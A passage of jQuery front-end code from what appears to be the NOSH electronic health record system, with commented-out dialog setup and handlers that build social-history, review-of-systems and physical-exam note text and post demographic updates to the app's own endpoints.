style="position:absolute;right:5px;top:5px;width:30px;color:red;"></i>'); } //refresh_timeline(); //$('.js').show(); //loadbuttons(); //$(".nosh_tooltip").tooltip(); //$(".phonemask").mask("(999) 999-9999"); //$("#dialog_load").dialog({ //height: 100, //autoOpen: false, //closeOnEscape: false, //dialogClass: "noclose", //modal: true //}); //var tz = jstz.determine(); //$.cookie('nosh_tz', tz.name(), { path: '/' }); //$('.textdump').swipe({ //swipeRight: function(){ //var elem = $(this); //textdump(elem); //} //}); //$("#textdump_group").dialog({ //bgiframe: true, //autoOpen: false, //height: 300, //width: 400, //draggable: false, //resizable: false, //focus: function (event, ui) { //var id = $("#textdump_group_id").val(); //if (id != '') { //$("#"+id).focus(); //} //}, //close: function (event, ui) { //$("#textdump_group_target").val(''); //$("#textdump_group_add").val(''); //$("#textdump_group_html").html(''); //} //}); //$("#restricttextgroup_dialog").dialog({ //bgiframe: true, //autoOpen: false, //height: 200, //width: 400, //draggable: false, //resizable: false, //closeOnEscape: false, //dialogClass: "noclose", //close: function (event, ui) { //$("#restricttextgroup_form").clearForm(); //}, //buttons: { //'Save': function() { //var str = $("#restricttextgroup_form").serialize(); //$.ajax({ //type: "POST", //url: "ajaxsearch/restricttextgroup-save", //data: str, //success: function(data){ //$.jGrowl(data); //$("#restricttextgroup_dialog").dialog('close'); //} //}); //}, //Cancel: 
function() { //$("#restricttextgroup_dialog").dialog('close'); //} //} //}); //$("#textdump").dialog({ //bgiframe: true, //autoOpen: false, //height: 300, //width: 400, //draggable: false, //resizable: false, //closeOnEscape: false, //dialogClass: "noclose", //close: function (event, ui) { //$("#textdump_target").val(''); //$("#textdump_input").val(''); //$("#textdump_add").val(''); //$("#textdump_group_item").val(''); //$("#textdump_html").html(''); //}, //buttons: [{ //text: 'Save', //id: 'textdump_dialog_save', //class: 'nosh_button_save', //click: function() { //var id = $("#textdump_target").val(); //var old = $("#"+id).val(); //var delimiter = $("#textdump_delimiter1").val(); //var input = ''; //var text = []; //$("#textdump_html").find('.textdump_item').each(function() { //if ($(this).find(':first-child').hasClass("ui-state-error") == true) { //var a = $(this).text(); //text.push(a); //} //}); //if (old != '') { //input += old + '\n' + $("#textdump_group_item").val() + ": "; //} else { //input += $("#textdump_group_item").val() + ": "; //} //input += text.join(delimiter); //$("#"+id).val(input); //$("#textdump").dialog('close'); //} //},{ //text: 'Cancel', //id: 'textdump_dialog_cancel', //class: 'nosh_button_cancel', //click: function() { //$("#textdump").dialog('close'); //} //}] //}); //$("#textdump_specific").dialog({ //bgiframe: true, //autoOpen: false, //height: 300, //width: 400, //draggable: false, //resizable: false, //closeOnEscape: false, //dialogClass: "noclose", //close: function (event, ui) { //$("#textdump_specific_target").val(''); //$("#textdump_specific_start").val(''); //$("#textdump_specific_length").val(''); //$("#textdump_specific_origin").val(''); //$("#textdump_specific_add").val(''); //$("#textdump_specific_html").html(''); //$("#textdump_specific_save").show(); //$("#textdump_specific_cancel").show(); //$("#textdump_specific_done").show(); //$("#textdump_delimiter_div").show(); //}, //buttons: [{ //text: 'Save', //id: 'textdump_specific_save', //class: 'nosh_button_save', //click: function() { //var origin = $("#textdump_specific_origin").val(); //if (origin != 'configure') { //var id = $("#textdump_specific_target").val(); //var start = $("#textdump_specific_start").val(); //var length = $("#textdump_specific_length").val(); //var delimiter = $("#textdump_delimiter").val(); //var text = []; //$("#textdump_specific_html").find('.textdump_item_specific').each(function() { //if ($(this).find(':first-child').hasClass("ui-state-error") == true) { //var a = $(this).text(); //text.push(a); //} //}); //var input = text.join(delimiter); //$("#"+id).textrange('set', start, length); //$("#"+id).textrange('replace', input); //} //$("#textdump_specific").dialog('close'); //} //},{ //text: 'Cancel', //id: 'textdump_specific_cancel', //class: 'nosh_button_cancel', //click: function() { //$("#textdump_specific").dialog('close'); //} //},{ //text: 'Done', //id: 'textdump_specific_done', //class: 'nosh_button_check', //click: function() { //$("#textdump_specific").dialog('close'); //} //}] //}); //$("#textdump_group_html").tooltip(); //$("#textdump_html").tooltip(); //$("#textdump_hint").tooltip({ //content: function(callback) { //var ret = ''; //$.ajax({ //type: "POST", //url: "ajaxdashboard/listmacros", //success: function(data){ //callback(data); //} //}); //}, //position: { my: "left bottom+15", at: "left top", collision: "flipfit" }, //open: function (event, ui) { //setTimeout(function() { //$(ui.tooltip).hide('explode'); //}, 6000); //}, //track: true //}); 
//$("#template_encounter_edit_dialog").dialog({ //bgiframe: true, //autoOpen: false, //height: 400, //width: 600, //closeOnEscape: false, //dialogClass: "noclose", //close: function(event, ui) { //$('#template_encounter_edit_form').clearForm(); //$('#template_encounter_edit_div').empty(); //reload_grid("encounter_templates_list"); //if ($("#template_encounter_dialog").dialog("isOpen")) { //$.ajax({ //type: "POST", //url: "ajaxencounter/get-encounter-templates", //dataType: "json", //success: function(data){ //$("#template_encounter_choose").removeOption(/./); //if(data.response == true){ //$("#template_encounter_choose").addOption(data.message, false); //} else { //$("#template_encounter_choose").addOption({"":"No encounter templates"}, false); //} //} //}); //} //}, //buttons: { //'Add Field': function() { //var a = $("#template_encounter_edit_div > :last-child").attr("id"); //if (a == 'encounter_template_grid_label') { //var count = 0; //} else { //var a1 = a.split("_"); //var count = parseInt(a1[4]) + 1; //} //$("#template_encounter_edit_div").append('<div id="group_encounter_template_div_'+count+'" class="pure-u-1-3"><select name="group[]" id="encounter_template_group_id_'+count+'" class="text encounter_template_group_group" style="width:95%"></select></div><div id="array_encounter_template_div_'+count+'" class="pure-u-1-3"><select name="array[]" id="encounter_template_array_id_'+count+'" class="text" style="width:95%"></select></div><div id="remove_encounter_template_div_'+count+'" class="pure-u-1-3"><button type="button" id="remove_encounter_template_field_'+count+'" class="remove_encounter_template_field nosh_button_cancel">Remove Field</button></div>'); //if (a == 'encounter_template_grid_label') { //var b = $("#template_encounter_edit_dialog_encounter_template").val(); //$.ajax({ //type: "POST", //url: "ajaxsearch/get-template-fields/" + b, //dataType: "json", //success: function(data){ //$("#encounter_template_group_id_"+count).addOption({'':'Choose Field'}, false); //$("#encounter_template_group_id_"+count).addOption(data, false); //$("#encounter_template_group_id_"+count).focus(); //loadbuttons(); //} //}); //} else { //$("#encounter_template_group_id_0").copyOptions("#encounter_template_group_id_"+count, "all"); //$("#encounter_template_group_id_"+count).val($("#encounter_template_group_id_"+count+" option:first").val()) //$("#encounter_template_group_id_"+count).focus(); //loadbuttons(); //} //}, //'Save': function() { //var bValid = true; //$("#template_encounter_edit_form").find("[required]").each(function() { //var input_id = $(this).attr('id'); //var id1 = $("#" + input_id); //var text = $("label[for='" + input_id + "']").html(); //bValid = bValid && checkEmpty(id1, text); //}); //if (bValid) { //var str = $("#template_encounter_edit_form").serialize(); //if(str){ //$('#dialog_load').dialog('option', 'title', "Saving template...").dialog('open'); //$.ajax({ //type: "POST", //url: "ajaxsearch/save-encounter-templates", //data: str, //success: function(data){ //$('#dialog_load').dialog('close'); //if (data == 'There is already a template with the same name!') { //$.jGrowl(data); //$("#encounter_template_name_text").addClass("ui-state-error"); //} else { //$.jGrowl(data); //$('#template_encounter_edit_dialog').dialog('close'); //} //} //}); //} else { //$.jGrowl("Please complete the form"); //} //} //}, //Cancel: function() { //$('#template_encounter_edit_dialog').dialog('close'); //} //} //}); //$("#timeline_dialog").dialog({ //bgiframe: true, //autoOpen: false, //height: 
//	500,
//	width: 650,
//	draggable: false,
//	resizable: false,
//	open: function(event, ui) {
//	},
//	close: function(event, ui) {
//		$("#timeline").html('');
//	},
//	position: { my: 'center', at: 'center', of: '#maincontent' }
//});
});

$(document).on("click", "#encounter_panel", function() {
	noshdata.encounter_active = 'y';
	openencounter();
	$("#nosh_chart_div").hide();
	$("#nosh_encounter_div").show();
});

$(document).on("click", ".ui-jqgrid-titlebar", function() {
	$(".ui-jqgrid-titlebar-close", this).click();
});

$(document).on('click', '#save_oh_sh_form', function(){
	var old = $("#oh_sh").val();
	var old1 = old.trim();
	var a = $("#sh1").val();
	var b = $("#sh2").val();
	var c = $("#sh3").val();
	var d = $("#oh_sh_marital_status").val();
	var d0 = $("#oh_sh_marital_status_old").val();
	var e = $("#oh_sh_partner_name").val();
	// bug fix: the original read the live field twice, so the "e != e0" change
	// check below could never fire; this assumes partner name follows the same
	// *_old hidden-field convention as marital status above
	var e0 = $("#oh_sh_partner_name_old").val();
	var f = $("#sh4").val();
	var g = $("#sh5").val();
	var h = $("#sh6").val();
	var i = $("#sh7").val();
	var j = $("#sh8").val();
	var k = $("input[name='sh9']:checked").val();
	var l = $("input[name='sh10']:checked").val();
	var m = $("input[name='sh11']:checked").val();
	if(a){ var a1 = 'Family members in the household: ' + a + '\n'; } else { var a1 = ''; }
	if(b){ var b1 = 'Children: ' + b + '\n'; } else { var b1 = ''; }
	if(c){ var c1 = 'Pets: ' + c + '\n'; } else { var c1 = ''; }
	if(d){ var d1 = 'Marital status: ' + d + '\n'; } else { var d1 = ''; }
	if(e){ var e1 = 'Partner name: ' + e + '\n'; } else { var e1 = ''; }
	if(f){ var f1 = 'Diet: ' + f + '\n'; } else { var f1 = ''; }
	if(g){ var g1 = 'Exercise: ' + g + '\n'; } else { var g1 = ''; }
	if(h){ var h1 = 'Sleep: ' + h + '\n'; } else { var h1 = ''; }
	if(i){ var i1 = 'Hobbies: ' + i + '\n'; } else { var i1 = ''; }
	if(j){ var j1 = 'Child care arrangements: ' + j + '\n'; } else { var j1 = ''; }
	if(k){ var k1 = k + '\n'; } else { var k1 = ''; }
	if(l){ var l1 = l + '\n'; } else { var l1 = ''; }
	if(m){ var m1 = m + '\n'; } else { var m1 = ''; }
	var full = d1+e1+a1+b1+c1+f1+g1+h1+i1+j1+k1+l1+m1;
	var full1 = full.trim();
	if (old1 != '') { var n = old1+'\n'+full1+'\n'; } else { var n = full1+'\n'; }
	var o = n.length;
	$("#oh_sh").val(n).caret(o);
	if(d != d0 || e != e0) {
		$.ajax({
			type: "POST",
			url: "ajaxencounter/edit-demographics/sh",
			data: "marital_status=" + d + "&partner_name=" + e,
			success: function(data){
				$.jGrowl(data);
			}
		});
	}
	// .prop('checked') reads the live state; the original used .attr('checked'),
	// which reflects the initial markup only (the tobacco handler below already
	// uses .prop for the same purpose)
	var sh9_y = $('#sh9_y').prop('checked');
	var sh9_n = $('#sh9_n').prop('checked');
	if(sh9_y){
		$.ajax({
			type: "POST",
			url: "ajaxencounter/edit-demographics/sex",
			data: "status=yes",
			success: function(data){
				$.jGrowl(data);
			}
		});
	}
	if(sh9_n){
		$.ajax({
			type: "POST",
			url: "ajaxencounter/edit-demographics/sex",
			data: "status=no",
			success: function(data){
				$.jGrowl(data);
			}
		});
	}
});

$(document).on("click", '#save_oh_etoh_form', function(){
	var old = $("#oh_etoh").val();
	var old1 = old.trim();
	var a = $("input[name='oh_etoh_select']:checked").val();
	var a0 = $("#oh_etoh_text").val();
	if(a){ var a1 = a + a0; } else { var a1 = ''; }
	if (old1 != '') { var b = old1+'\n'+a1+'\n'; } else { var b = a1+'\n'; }
	var c = b.length;
	$("#oh_etoh").val(b).caret(c);
});

$(document).on('click', '#save_oh_tobacco_form', function(){
	var old = $("#oh_tobacco").val();
	var old1 = old.trim();
	var a = $("input[name='oh_tobacco_select']:checked").val();
	var a0 = $("#oh_tobacco_text").val();
	if(a){ var a1 = a + a0; } else { var a1 = ''; }
	if (old1 != '') { var b = old1+'\n'+a1+'\n'; } else { var b = a1+'\n'; }
	var c = b.length;
	$("#oh_tobacco").val(b).caret(c);
	var tobacco_y =
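// push the smoking status change to the patient demographics record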
$('#oh_tobacco_y').prop('checked'); var tobacco_n = $('#oh_tobacco_n').prop('checked'); if(tobacco_y){ $.ajax({ type: "POST", url: "ajaxencounter/edit-demographics/tobacco", data: "status=yes", success: function(data){ $.jGrowl(data); } }); } if(tobacco_n){ $.ajax({ type: "POST", url: "ajaxencounter/edit-demographics/tobacco", data: "status=no", success: function(data){ $.jGrowl(data); } }); } }); $(document).on('click', '#save_oh_drugs_form', function(){ var old = $("#oh_drugs").val(); var old1 = old.trim(); var a = $("input[name='oh_drugs_select']:checked").val(); if(a){ if (a == 'No illicit drug use.') { var a1 = a; } else { var a0 = $("#oh_drugs_text").val(); var a2 = $("#oh_drugs_text1").val(); var a1 = a + a0 + '\nFrequency of drug use: ' + a2; $('#oh_drugs_input').hide(); $('#oh_drugs_text').val(''); $("#oh_drugs_text1").val(''); $("input[name='oh_drugs_select']").each(function(){ $(this).prop('checked', false); }); $('#oh_drugs_form input[type="radio"]').button('refresh'); } } else { var a1 = ''; $('#oh_drugs_input').hide(); } if (old1 != '') { var b = old1+'\n'+a1+'\n'; } else { var b = a1+'\n'; } var c = b.length; $("#oh_drugs").val(b).caret(c); }); $(document).on('click', '#save_oh_employment_form', function(){ var old = $("#oh_employment").val(); var old1 = old.trim(); var a = $("input[name='oh_employment_select']:checked").val(); var b = $("#oh_employment_text").val(); var c = $("#oh_employment_employer").val(); var c0 = $("#oh_employment_employer_old").val(); if(a){ var a1 = a + '\n'; } else { var a1 = ''; } if(b){ var b1 = 'Employment field: ' + b + '\n'; } else { var b1 = ''; } if(c){ var c1 = 'Employer: ' + c + '\n'; } else { var c1 = ''; } var full = a1+b1+c1; var full1 = full.trim(); if (old1 != '') { var d = old1+'\n'+full1+'\n'; } else { var d = full1+'\n'; } var e = d.length; $("#oh_employment").val(d).caret(e); if(c != c0){ $.ajax({ type: "POST", url: "ajaxencounter/edit-demographics/employer", data: "employer=" + c, success: function(data){ $.jGrowl(data); } }); } }); function updateTextArea(parent_id_entry) { var newtext = ''; $('#' + parent_id_entry + '_form :checked').each(function() { newtext += $(this).val() + ' '; }); $('#' + parent_id_entry).val(newtext); } function ros_normal(parent_id) { var id = parent_id; var x = parent_id.length - 1; parent_id = parent_id.slice(0,x); $("#" + id).siblings('input:checkbox').each(function(){ var parent_id = $(this).attr("id"); $(this).prop('checked',false); var parts = parent_id.split('_'); if (parts[1] == 'wccage') { var parent_id_entry = 'ros_wcc'; } else { var parent_id_entry = parts[0] + '_' + parts[1]; } var a = $(this).val(); remove_text(parent_id_entry,a,'',false); if (parts[1] == 'wccage') { $("#ros_wcc_age_form input:checkbox").button('refresh'); } else { $("#" + parent_id_entry + "_form input:checkbox").button('refresh'); } }); $("#" + parent_id + "_div").find('.ros_detail_text').each(function(){ var parent_id = $(this).attr("id"); var parts = parent_id.split('_'); if (parts[1] == 'wccage') { var parent_id_entry = 'ros_wcc'; } else { var parent_id_entry = parts[0] + '_' + parts[1]; } var old = $("#" + parent_id_entry).val(); var a = ' ' + $(this).val(); remove_text(parent_id_entry,a,'',false); $(this).hide(); }); } function ros_other(parent_id) { var x = parent_id.length - 1; parent_id = parent_id.slice(0,x); $("#" + parent_id + "_div").find('.ros_normal:checkbox').each(function(){ var parent_id = $(this).attr("id"); $(this).prop('checked',false); var parts = parent_id.split('_'); if (parts[1] == 'wccage') { var 
parent_id_entry = 'ros_wcc'; } else { var parent_id_entry = parts[0] + '_' + parts[1]; } var old = $("#" + parent_id_entry).val(); var a = $(this).val(); remove_text(parent_id_entry,a,'',false); if (parts[1] == 'wccage') { $("#ros_wcc_age_form input:checkbox").button('refresh'); } else { $("#" + parent_id_entry + "_form input:checkbox").button('refresh'); } }); } $(document).on("click", '.ros_template_div input[type="checkbox"]', function() { var parent_id = $(this).attr("id"); var parts = parent_id.split('_'); if (parts[1] == 'wccage') { var parent_id_entry = 'ros_wcc'; } else { var parent_id_entry = parts[0] + '_' + parts[1]; } var label = parts[0] + '_' + parts[1] + '_' + parts[2] + '_label'; var label_text = $("#" + label).text() + ': '; var old = $("#" + parent_id_entry).val(); var a = $(this).val(); var repeat = repeat_text(parent_id_entry,a,label_text); if ($(this).prop('checked') && repeat !== true) { if (old != '') { var comma = a.charAt(0); var old_arr = old.split(' '); var new_arr = search_array(old_arr, label_text); if (new_arr.length > 0 && label_text != ': ') { var arr_index = old_arr.indexOf(new_arr[0]); a = a.replace(label_text, '; '); old_arr[arr_index] += a; } else { old_arr.push(a); } var b = old_arr.join(" "); } else { var b = a; } $("#" + parent_id_entry).val(b); if ($(this).is('.ros_normal')) { ros_normal(parent_id); } else { ros_other(parent_id); } } else { if (label_text == ': ') { label_text = ''; } remove_text(parent_id_entry,a,label_text,false); } }); $(document).on("click", '.ros_template_div input[type="radio"]', function() { var parent_id = $(this).attr("id"); var parts = parent_id.split('_'); if (parts[1] == 'wccage') { var parent_id_entry = 'ros_wcc'; } else { var parent_id_entry = parts[0] + '_' + parts[1]; } var old = $("#" + parent_id_entry).val(); var a = $(this).val(); var repeat = repeat_text(parent_id_entry,a,''); console.log(repeat); if ($(this).prop('checked') && repeat !== true) { if (old != '') { $(this).siblings('input:radio').each(function() { var d = $(this).val(); var d1 = ' ' + d; old = old.replace(d1,''); old = old.replace(d, ''); }); if (old != '') { var b = old + ' ' + a; } else { var b = a; } } else { var b = a; } $("#" + parent_id_entry).val(b); } else { remove_text(parent_id_entry,a,'',false); } }); $(document).on("change", '.ros_template_div select', function() { var parent_id = $(this).attr("id"); var parts = parent_id.split('_'); if (parts[1] == 'wccage') { var parent_id_entry = 'ros_wcc'; } else { var parent_id_entry = parts[0] + '_' + parts[1]; } var old = $("#" + parent_id_entry).val(); var a = $(this).val(); if (old != '') { $(this).siblings('option').each(function() { var d = $(this).val(); var d1 = ' ' + d; old = old.replace(d1,''); old = old.replace(d, ''); }); var b = old + ' ' + a; } else { var b = a; } $("#" + parent_id_entry).val(b); }); $(document).on('focus', '.ros_template_div input[type="text"]', function() { noshdata.old_text = $(this).val(); }); $(document).on('focusout', '.ros_template_div input[type="text"]', function() { var a = $(this).val(); if (a != noshdata.old_text) { if (a != '') { var parent_id = $(this).attr("id"); var parts = parent_id.split('_'); if (parts[1] == 'wccage') { var parent_id_entry = 'ros_wcc'; } else { var parent_id_entry = parts[0] + '_' + parts[1]; } var x = parent_id.length - 1; var parent_div = parent_id.slice(0,x); var start1 = $("#" + parent_div + "_div").find('span:first').text(); if (start1 == '') { start1 = $("#" + parts[0] + '_' + parts[1] + '_' + parts[2] + '_label').text(); } var 
start1_n = start1.lastIndexOf(' ('); if (start1_n != -1) { var start1_n1 = start1.substring(0,start1_n); var start1_n2 = start1_n1.toLowerCase(); } else { var start1_n1 = start1; var start1_n2 = start1; } var start2 = $("label[for='" + parent_id + "']").text(); var start3_n = start1.lastIndexOf('degrees'); if (start3_n != -1) { var end_text = ' degrees.'; } else { var end_text = ''; } var start4 = $(this).closest('div.ui-accordion').find('h3.ui-state-active').text(); if (start4 != '') { var start4_n = start4.lastIndexOf('-'); if (start4_n != -1) { var parts2 = start4.split(' - '); var mid_text = ', ' + parts2[1].toLowerCase(); } else { var mid_text = ', ' + start4.toLowerCase(); } } else { var mid_text = ''; } if (!!start2) { var start_text = start2 + ' ' + start1_n2; } else { var start_text = start1_n1; } var old = $("#" + parent_id_entry).val(); var a_pointer = a.length - 1; var a_pointer2 = a.lastIndexOf('.'); if (!!old) { if (!!start_text) { var c = start_text + mid_text + ': ' + a + end_text; if (noshdata.old_text != '') { var c_old = start_text + mid_text + ': ' + noshdata.old_text + end_text; } } else { if (a_pointer != a_pointer2) { var c = a + '.'; } else { var c = a; } } if (noshdata.old_text != '') { var old_text_pointer = noshdata.old_text.length - 1; var old_text_pointer2 = noshdata.old_text.lastIndexOf('.'); if (old_text_pointer != old_text_pointer2) { var old_text1 = noshdata.old_text + '.'; } else { var old_text1 = noshdata.old_text; } if (!!start_text) { var b = old.replace(c_old, c); } else { var b = old.replace(old_text1, c); } noshdata.old_text = ''; } else { var b = old + ' ' + c; } } else { if (!!start_text) { var b = start_text + mid_text + ': ' + a + end_text; } else { if (a_pointer != a_pointer2) { var b = a + '.'; } else { var b = a; } } } $("#" + parent_id_entry).val(b); } } }); $(document).on('click', '.ros_template_div .ros_detail', function() { var detail_id = $(this).attr("id") + '_detail'; if ($(this).prop('checked')) { $('#' + detail_id).show('fast'); $('#' + detail_id).focus(); } else { var parent_id = $(this).attr("id"); var parts = parent_id.split('_'); if (parts[1] == 'wccage') { var parent_id_entry = 'ros_wcc'; } else { var parent_id_entry = parts[0] + '_' + parts[1]; } var old = $("#" + parent_id_entry).val(); var a = ' ' + $('#' + detail_id).val(); var a1 = a + ' '; var c = old.replace(a1,''); c = c.replace(a, ''); $("#" + parent_id_entry).val(c); $('#' + detail_id).hide('fast'); } }); $(document).on("click", '.all_normal', function(){ var a = $(this).prop('checked'); var parent_id = $(this).attr("id"); var parts = parent_id.split('_'); if (parts[1] == 'wcc') { if(a){ $("#ros_wcc_form").find("input.ros_normal:checkbox").each(function(){ $(this).prop("checked",true); }); $("#ros_wcc_age_form").find("input.ros_normal:checkbox").each(function(){ $(this).prop("checked",true); }); var newtext = ''; $('#ros_wcc_form :checked').each(function() { newtext += $(this).val() + ' '; }); $('#ros_wcc_age_form :checked').each(function() { newtext += $(this).val() + ' '; }); $('#ros_wcc').val(newtext); } else { $("#ros_wcc").val(''); $("#ros_wcc_form").find('input.ros_normal:checkbox').each(function(){ $(this).prop("checked",false); }); $("#ros_wcc_age_form").find('input.ros_normal:checkbox').each(function(){ $(this).prop("checked",false); }); } $('#ros_wcc_form input[type="checkbox"]').button('refresh'); $('#ros_wcc_age_form input[type="checkbox"]').button('refresh'); } else { var parent_id_entry = parts[0] + '_' + parts[1]; if(a){ $("#" + parent_id_entry + 
"_form").find("input.ros_normal:checkbox").each(function(){ $(this).prop("checked",true); }); updateTextArea(parent_id_entry); } else { $("#" + parent_id_entry).val(''); $("#" + parent_id_entry + "_form").find('input.ros_normal:checkbox').each(function(){ $(this).prop("checked",false); }); } $("#" + parent_id_entry + '_form input[type="checkbox"]').button('refresh'); } }); $(document).on("click", '.all_normal1_ros', function(){ var a = $(this).prop('checked'); var parent_id = $(this).attr("id"); var parts = parent_id.split('_'); var parent_id_entry = parts[0] + '_' + parts[1]; $.ajax({ type: "POST", url: "ajaxencounter/all-normal/ros/" + parent_id_entry, dataType: 'json', success: function(data){ var message = ''; $.each(data, function(key, value){ if(a){ $("#" + key).val(value); message = "All normal values set!"; } else { $("#" + key).val(''); message = "All normal values cleared!"; } }); $.jGrowl(message); } }); }); function updateTextArea_pe(parent_id_entry) { var newtext = ''; $('#' + parent_id_entry + '_form :checked').each(function() { newtext += $(this).val() + ' '; }); $('#' + parent_id_entry).val(newtext); } function pe_normal(parent_id) { var id = parent_id; var x = parent_id.length - 1; parent_id = parent_id.slice(0,x); $("#" + id).siblings('input:checkbox').each(function() { var parent_id = $(this).attr("id"); $(this).prop('checked',false); var parts = parent_id.split('_'); var parent_id_entry = parts[0] + '_' + parts[1]; var old = $("#" + parent_id_entry).val(); var a = $(this).val(); remove_text(parent_id_entry,a,'',false); $(this).button('refresh'); }); $("#" + parent_id + "_div").find('.pe_detail_text').each(function(){ var parent_id = $(this).attr("id"); var parts = parent_id.split('_'); var parent_id_entry = parts[0] + '_' + parts[1]; var old = $("#" + parent_id_entry).val(); if ($(this).val() != '') { var text_pointer = $(this).val().length - 1; var text_pointer2 = $(this).val().lastIndexOf('.'); if (text_pointer != text_pointer2) { var text1 = $(this).val() + '.'; } else { var text1 = $(this).val(); } var a = ' ' + text1; remove_text(parent_id_entry,a,'',false); } $(this).val(''); $(this).hide(); }); } function pe_other(parent_id) { var x = parent_id.length - 1; parent_id = parent_id.slice(0,x); $("#" + parent_id + "_div").find('.pe_normal:checkbox').each(function(){ var parent_id = $(this).attr("id"); $(this).prop('checked',false); var parts = parent_id.split('_'); var parent_id_entry = parts[0] + '_' + parts[1]; var old = $("#" + parent_id_entry).val(); var a = $(this).val(); remove_text(parent_id_entry,a,'',false); //var a1 = a + ' '; //var c = old.replace(a1,''); //c = c.replace(a, ''); //$("#" + parent_id_entry).val(c); $(this).button('refresh'); }); } $(document).on("click", '.pe_template_div input[type="checkbox"]', function() { var parent_id = $(this).attr("id"); var parts = parent_id.split('_'); var parent_id_entry = parts[0] + '_' + parts[1]; var label = parts[0] + '_' + parts[1] + '_' + parts[2] + '_label'; var label_text = $("#" + label).text() + ': '; var old = $("#" + parent_id_entry).val(); var a = $(this).val(); var repeat = repeat_text(parent_id_entry,a,label_text); if ($(this).is(':checked') && repeat !== true) { if (old != '') { var comma = a.charAt(0); var old_arr = old.split(' '); var new_arr = search_array(old_arr, label_text); if (new_arr.length > 0) { var arr_index = old_arr.indexOf(new_arr[0]); a = a.replace(label_text, '; '); old_arr[arr_index] += a; } else { old_arr.push(a); } var b = old_arr.join(" "); } else { var b = a; } $("#" + 
parent_id_entry).val(b); if ($(this).is('.pe_normal')) { pe_normal(parent_id); } else { pe_other(parent_id); } } else { remove_text(parent_id_entry,a,label_text,false); } }); $(document).on("change", '.pe_template_div input[type="radio"]', function() { var parent_id = $(this).attr("id"); var parts = parent_id.split('_'); var parent_id_entry = parts[0] + '_' + parts[1]; var old = $("#" + parent_id_entry).val(); var a = $(this).val(); var repeat = repeat_text(parent_id_entry,a,''); if ($(this).is(':checked') && repeat !== true) { if (old != '') { $(this).siblings('input:radio').each(function() { var d = $(this).val(); var d1 = ' ' + d; old = old.replace(d1,''); old = old.replace(d, ''); }); if (old != '') { var b = old + ' ' + a; } else { var b = a; } } else { var b = a; } $("#" + parent_id_entry).val(b); } else { remove_text(parent_id_entry,a,'',false); } }); $(document).on("change", '.pe_template_div select', function() { var parent_id = $(this).attr("id"); var parts = parent_id.split('_'); var parent_id_entry = parts[0] + '_' + parts[1]; var old = $("#" + parent_id_entry).val(); var a = $(this).val(); if (old != '') { $(this).siblings('option').each(function() { var d = $(this).val(); var d1 = ' ' + d; old = old.replace(d1,''); old = old.replace(d, ''); }); var b = old + ' ' + a; } else { var b = a; } $("#" + parent_id_entry).val(b); }); $(document).on("focus", '.pe_template_div input[type="text"]', function() { noshdata.old_text = $(this).val(); }); $(document).on("focusout", '.pe_template_div input[type="text"]', function() { var a = $(this).val(); if (a != noshdata.old_text) { if (a != '') { var parent_id = $(this).attr("id"); var parts = parent_id.split('_'); var parent_id_entry = parts[0] + '_' + parts[1]; var x = parent_id.length - 1; var parent_div = parent_id.slice(0,x); var start1 = $("#" + parent_div + "_div").find('span:first').text(); if (start1 == '') { start1 = $("#" + parts[0] + '_' + parts[1] + '_' + parts[2] + '_label').text(); } var start1_n = start1.lastIndexOf(' ('); if (start1_n != -1) { var start1_n1 = start1.substring(0,start1_n); var start1_n2 = start1_n1.toLowerCase(); } else { var start1_n1 = start1; var start1_n2 = start1; } var start2 = $("label[for='" + parent_id + "']").text(); var start3_n = start1.lastIndexOf('degrees'); if (start3_n != -1) { var end_text = ' degrees.'; } else { var end_text = ''; } var start4 = $(this).closest('div.ui-accordion').find('h3.ui-state-active').text(); if (start4 != '') { var start4_n = start4.lastIndexOf('-'); if (start4_n != -1) { var parts2 = start4.split(' - '); var mid_text = ', ' + parts2[1].toLowerCase(); } else { var mid_text = ', ' + start4.toLowerCase(); } } else { var mid_text = ''; } if (!!start2) { var start_text = start2 + ' ' + start1_n2; } else { var start_text = start1_n1; } var old = $("#" + parent_id_entry).val(); var a_pointer = a.length - 1; var a_pointer2 = a.lastIndexOf('.'); if (!!old) { if (!!start_text) { var c = start_text + mid_text + ': ' + a + end_text; if (noshdata.old_text != '') { var c_old = start_text + mid_text + ': ' + noshdata.old_text + end_text; } } else { if (a_pointer != a_pointer2) { var c = a + '.'; } else { var c = a; } } if (noshdata.old_text != '') { var old_text_pointer = noshdata.old_text.length - 1; var old_text_pointer2 = noshdata.old_text.lastIndexOf('.'); if (old_text_pointer != old_text_pointer2) { var old_text1 = noshdata.old_text + '.'; } else { var old_text1 = noshdata.old_text; } if (!!start_text) { var b = old.replace(c_old, c); } else { var b = old.replace(old_text1, 
c); }
				noshdata.old_text = '';
			} else {
				var b = old + ' ' + c;
			}
		} else {
			if (!!start_text) {
				var b = start_text + mid_text + ': ' + a + end_text;
			} else {
				if (a_pointer != a_pointer2) { var b = a + '.'; } else { var b = a; }
			}
		}
		$("#" + parent_id_entry).val(b);
	}
}
});

$(document).on("click", '.pe_template_div .pe_detail', function() {
	var detail_id = $(this).attr("id") + '_detail';
	if ($(this).is(':checked')) {
		$('#' + detail_id).show('fast');
		$('#' + detail_id).focus();
	} else {
		var parent_id = $(this).attr("id");
		var parts = parent_id.split('_');
		var parent_id_entry = parts[0] + '_' + parts[1];
		var old = $("#" + parent_id_entry).val();
		if ($('#' + detail_id).val() != '') {
			var text_pointer = $('#' + detail_id).val().length - 1;
			var text_pointer2 = $('#' + detail_id).val().lastIndexOf('.');
			if (text_pointer != text_pointer2) { var text1 = $('#' + detail_id).val() + '.'; } else { var text1 = $('#' + detail_id).val(); }
			var a = ' ' + text1;
			var a1 = a + ' ';
			var c = old.replace(a1,'');
			c = c.replace(a, '');
			$("#" + parent_id_entry).val(c);
		}
		$('#' + detail_id).val('');
		$('#' + detail_id).hide('fast');
	}
});

$(document).on("click", '.all_normal_pe', function(){
	var a = $(this).is(':checked');
	var parent_id = $(this).attr("id");
	var n = parent_id.lastIndexOf('_');
	var parent_id_entry = parent_id.substring(0,n);
	if(a){
		$("#" + parent_id_entry + "_form").find("input.pe_normal:checkbox").each(function(){
			$(this).prop("checked",true);
		});
		updateTextArea_pe(parent_id_entry);
	} else {
		$("#" + parent_id_entry).val('');
		$("#" + parent_id_entry + "_form").find('input.pe_normal:checkbox').each(function(){
			$(this).prop("checked",false);
		});
	}
	$("#" + parent_id_entry + '_form input[type="checkbox"]').button('refresh');
});

$(document).on("click", '.all_normal1_pe', function(){
	var a = $(this).is(':checked');
	var parent_id = $(this).attr("id");
	var parent_id_entry = parent_id.replace('normal','dialog');
	if(a){
		$("#" + parent_id_entry).find(".all_normal_pe").each(function(){
			$(this).prop("checked",true);
			var parent_id1 = $(this).attr("id");
			var n1 = parent_id1.lastIndexOf('_');
